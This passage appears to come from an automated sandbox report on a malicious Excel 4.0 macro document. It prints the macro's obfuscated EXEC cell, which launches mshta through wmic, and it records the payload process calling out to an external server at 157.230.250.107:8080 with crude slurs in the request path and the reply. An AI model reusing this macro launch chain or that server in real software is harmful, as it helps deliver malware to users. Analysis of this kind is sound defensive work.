36,21,=K79-T79
38,21,=Y97+U38
39,21,=R29+X100
41,21,=J81+K59
42,21,=FWRITE(0,CHAR(fxrlv))
43,21,=Y19+N44
45,21,=Y40*F24
48,21,=M71+O47
49,21,=D36+A93
52,21,=NEXT()
53,21,=S19-S85
55,21,=X66+R32
57,21,=Z95-M87
58,21,=Q84*N75
60,21,=N20+B95
65,21,=EXEC(CHAR(119) & "mic process call create" & CHAR(32) & CHAR(34) & "msh" & CHAR(116) & "" & CHAR(97) & "" & CHAR(32) & CHAR(67) & ":\" & CHAR(80) & CHAR(114) & "ogramData\LZbir.rtf" & CHAR(34))
66,21,=K6+U87
68,21,=W80*Z35
71,21,=Z42-J68
73,21,=R52+F70
74,21,=U94-L78
76,21,=RETURN()

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Dec 2, 2021 00:37:52.698049068 CET497688080192.168.2.4157.230.250.107
                                                                                                                                        Dec 2, 2021 00:37:52.960607052 CET808049768157.230.250.107192.168.2.4
                                                                                                                                        Dec 2, 2021 00:37:52.960793018 CET497688080192.168.2.4157.230.250.107
                                                                                                                                        Dec 2, 2021 00:37:52.961247921 CET497688080192.168.2.4157.230.250.107
                                                                                                                                        Dec 2, 2021 00:37:53.222877026 CET808049768157.230.250.107192.168.2.4
                                                                                                                                        Dec 2, 2021 00:37:53.600121975 CET808049768157.230.250.107192.168.2.4
                                                                                                                                        Dec 2, 2021 00:37:53.761394978 CET497688080192.168.2.4157.230.250.107
                                                                                                                                        Dec 2, 2021 00:38:53.642189026 CET497688080192.168.2.4157.230.250.107
                                                                                                                                        Dec 2, 2021 00:38:53.904953003 CET808049768157.230.250.107192.168.2.4
                                                                                                                                        Dec 2, 2021 00:38:53.905056953 CET497688080192.168.2.4157.230.250.107

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • 157.230.250.107:8080

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.449768157.230.250.1078080C:\Windows\System32\mshta.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Dec 2, 2021 00:37:52.961247921 CET1637OUTGET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        Accept-Language: en-US
                                                                                                                                        User-Agent: booby
                                                                                                                                        Host: 157.230.250.107:8080
                                                                                                                                        Dec 2, 2021 00:37:53.600121975 CET1637INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx/1.15.12
                                                                                                                                        Date: Wed, 01 Dec 2021 23:37:53 GMT
                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                        Content-Length: 13
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Data Raw: 68 69 20 63 6f 77 66 75 63 6b 65 72 73
                                                                                                                                        Data Ascii: hi cowfuckers


                                                                                                                                        Code Manipulations

                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        Analysis Process: EXCEL.EXE PID: 7036 Parent PID: 800

                                                                                                                                        General

                                                                                                                                        Start time:00:37:38
                                                                                                                                        Start date:02/12/2021
                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                        Imagebase:0x60000
                                                                                                                                        File size:27110184 bytes
                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: WMIC.exe PID: 1000 Parent PID: 7036

                                                                                                                                        General

                                                                                                                                        Start time:00:37:48
                                                                                                                                        Start date:02/12/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:wmic process call create "mshta C:\ProgramData\LZbir.rtf"
                                                                                                                                        Imagebase:0x190000
                                                                                                                                        File size:391680 bytes
                                                                                                                                        MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: conhost.exe PID: 5948 Parent PID: 1000

                                                                                                                                        General

                                                                                                                                        Start time:00:37:49
                                                                                                                                        Start date:02/12/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        Chronological Activities

                                                                                                                                        Analysis Process: mshta.exe PID: 5348 Parent PID: 5060

                                                                                                                                        General

                                                                                                                                        Start time:00:37:50
                                                                                                                                        Start date:02/12/2021
                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:mshta C:\ProgramData\LZbir.rtf
                                                                                                                                        Imagebase:0x7ff7bdce0000
                                                                                                                                        File size:14848 bytes
                                                                                                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate

                                                                                                                                        Chronological Activities

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis

                                                                                                                                        Reset < >